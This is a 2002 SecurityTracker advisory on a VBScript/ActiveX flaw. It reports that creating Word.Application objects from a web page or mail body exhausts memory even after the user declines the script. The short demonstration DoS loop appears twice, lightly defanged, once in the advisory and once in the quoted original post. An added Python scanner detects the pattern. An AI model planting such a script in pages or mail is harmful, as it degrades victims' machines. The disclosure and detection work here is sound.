SecurityTracker.com
Category:   Application (Generic)  >   Microsoft Word
Vendors:   Microsoft
Microsoft Word Object Creation Flaw Lets Remote Users Create ActiveX That Will Consume Memory on the Victim's Computer
SecurityTracker Alert ID:  1004048
SecurityTracker URL:  http://securitytracker.com/id/1004048
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Apr 16 2002
Impact:   Denial of service via network
Exploit Included:  Yes  

Description:   A vulnerability was reported in the way Microsoft's VBScript creates Word objects. A remote user can create ActiveX code that will cause a denial of service condition on the victim's computer.

It is reported that there is a flaw in the ActiveX object creation used in VBScript for Word objects.

The following demonstration exploit code is provided (remove "_" before using it):

;<_SCRIPT LANGUAGE="VbScript">
;On Error Resume Next
;Dim a
;Dim i
;for i=1 to 100
;Set a = CreateObject("Word.Application")
;Next
;<_/SCRIPT>

According to the report, this will create an ActiveX object. If the user denies execution of the script, the script will apparently be stopped but the creation of the Word object will still continue in memory.

This flaw apparently affects IE/Outlook Express and Word2000/XP objects.

Impact:   A remote user can create ActiveX that, when loaded on the target (victim) user's computer, will cause a large amount of memory to be consumed on the target user's host, even if the target user denies execution of the script.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.microsoft.com/technet/security/
Cause:   Resource error
Underlying OS:  Windows (Any)

Message History:   None.
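
A static check for the pattern in the demonstration code, added here as an example and not part of the advisory or the original report: it extracts VBScript blocks from HTML (a web page or an HTML mail body) and reports CreateObject calls for Word.Application, noting whether each one sits inside a loop. The function and class names, the one-entry watch list and the sample page are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Assumed watch list; the advisory itself names only Word.Application.
WATCHED_PROGIDS = {"word.application"}
CREATE_RE = re.compile(r'CreateObject\s*\(\s*"([^"]+)"', re.I)
LOOP_OPEN = re.compile(r"(for|do|while)\b", re.I)
LOOP_CLOSE = re.compile(r"(next|loop|wend)\b", re.I)

class VBScriptCollector(HTMLParser):
    """Collect the bodies of <script> elements declared as VBScript."""
    def __init__(self):
        super().__init__()
        self.scripts, self._buf = [], None
    def handle_starttag(self, tag, attrs):
        declared = " ".join(v or "" for k, v in attrs if k in ("language", "type"))
        if tag == "script" and "vbscript" in declared.lower():
            self._buf = []
    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)
    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.scripts.append("".join(self._buf))
            self._buf = None

def scan_html(html):
    """Return (progid, inside_loop) for each watched CreateObject call."""
    collector = VBScriptCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for body in collector.scripts:
        depth = 0
        # VBScript statements end at a newline or a ':' separator.
        for stmt in (s.strip() for s in re.split(r"[\r\n:]+", body)):
            if LOOP_OPEN.match(stmt):
                depth += 1
            elif LOOP_CLOSE.match(stmt):
                depth = max(0, depth - 1)
            for progid in CREATE_RE.findall(stmt):
                if progid.lower() in WATCHED_PROGIDS:
                    findings.append((progid, depth > 0))
    return findings

# Constructed sample page for the demonstration, not captured traffic.
SAMPLE = ('<script language="VbScript">\nOn Error Resume Next\nFor i = 1 To 3\n'
          'Set a = CreateObject("Word.Application")\nNext\n</script>')
if __name__ == "__main__":
    print(scan_html(SAMPLE))
```

A finding with inside_loop set to True matches the repeated-instantiation shape in the report; a single call outside a loop is reported with False so it can be triaged separately.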


 Source Message Contents

Subject:  IE Word ActiveX DoS Loop




There is a flaw in ActiveX object creation
used in VBScript for Word objects; this can
be used as a Denial of Service.

Try to use this code (remove "_" before using it) :

;<_SCRIPT LANGUAGE="VbScript">
;On Error Resume Next
;Dim a
;Dim i
;for i=1 to 100
;Set a = CreateObject("Word.Application")
;Next
;<_/SCRIPT>

This script will activate the security warning about
creation of an ActiveX object, but when someone
clicks on "NO" and denies execution
of the script, the script is stopped, but
the creation of the Word object in memory still
continues. This sample script creates 100 Word
objects in memory.....it's a real DoS!
(try CTRL+ALT+DEL to see them)

Works for IE/Outlook Express and Word2000/XP
objects. Other Office components (Excel, PowerPoint,
Access, etc.) may not be affected.

Elia Florio

 
 

